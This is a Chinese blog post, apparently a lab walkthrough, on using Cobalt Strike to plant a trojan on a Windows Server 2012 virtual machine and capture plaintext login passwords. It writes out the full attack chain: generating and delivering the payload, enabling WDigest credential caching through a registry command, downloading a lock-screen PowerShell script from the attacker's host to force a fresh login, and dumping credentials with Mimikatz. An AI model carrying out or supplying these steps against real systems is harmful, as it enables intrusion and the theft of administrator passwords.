使用CS抓取WIN2012明文密码

目录

实验概述:       

开始实验:

实验准备:

打开CS:

生成木马控制wind2012:

抓取明文密码:


实验概述:       

        win2012及win10版本是不允许将明文密码储存在内存中的,此时我们就需要去修改注册表中的选项来使。但是修改后不会立即生效,需要我们执行一个脚本来使wind201息屏, 当管理员重新登录后才会生效。

开始实验:

实验准备:

在开始实验前我们需要两台虚拟机,kali为攻击机,win2012为被攻击机。

打开CS:

1:打开服务端并运行

2:打开客户端并运行

生成木马控制wind2012:

1:新建一个监听器

2:payload -> windows stageless payloads 生成木马,并绑定刚刚新建的监听器。

3:在kali上面搭建一个临时的web,让win2012访问并下载我们刚刚生成的CS木马,之后运行即可。

搭建网站:

访问下载运行:

运行后就可以在CS上看到有一台机器上线了:

抓取明文密码:

1:使用CS上自带的抓取工具正常情况下只能抓取到密文密码,如下:

Access -> Run Mimikatz

查看发现:只能抓取密文,不能抓取明文。

2:修改注册表

使用如下命令修改注册表:

shell reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 1 /f

如下:修改成功

3:在kali上面写一个脚本再将脚本传递到win2012上面,再通过命令执行。

在主目录下面创建:

Function Lock-WorkStation {
 
$signature = @"
[DllImport("user32.dll", SetLastError = true)]
public static extern bool LockWorkStation();
"@
 
$LockWorkStation = Add-Type -memberDefinition $signature -name "Win32LockWorkStation" -namespace Win32Functions -passthru
 
$LockWorkStation::LockWorkStation() | Out-Null
 
}
 
Lock-WorkStation

4:传递脚本

使用如下命令将脚本传递到win2012上面:

shell powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.240.154:9090/lock-screen.ps1','C:\lock-screen.ps1')

5:执行锁屏脚本

shell powershell c:\lock-screen.ps1

此时,我们去win2012查看,发现已经锁屏了,之后我们输入密码重新登录进去。

6:再次使用CS自带的密码抓取工具

此时,我们发现就可以成功的抓取出明文了。

  • 5
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值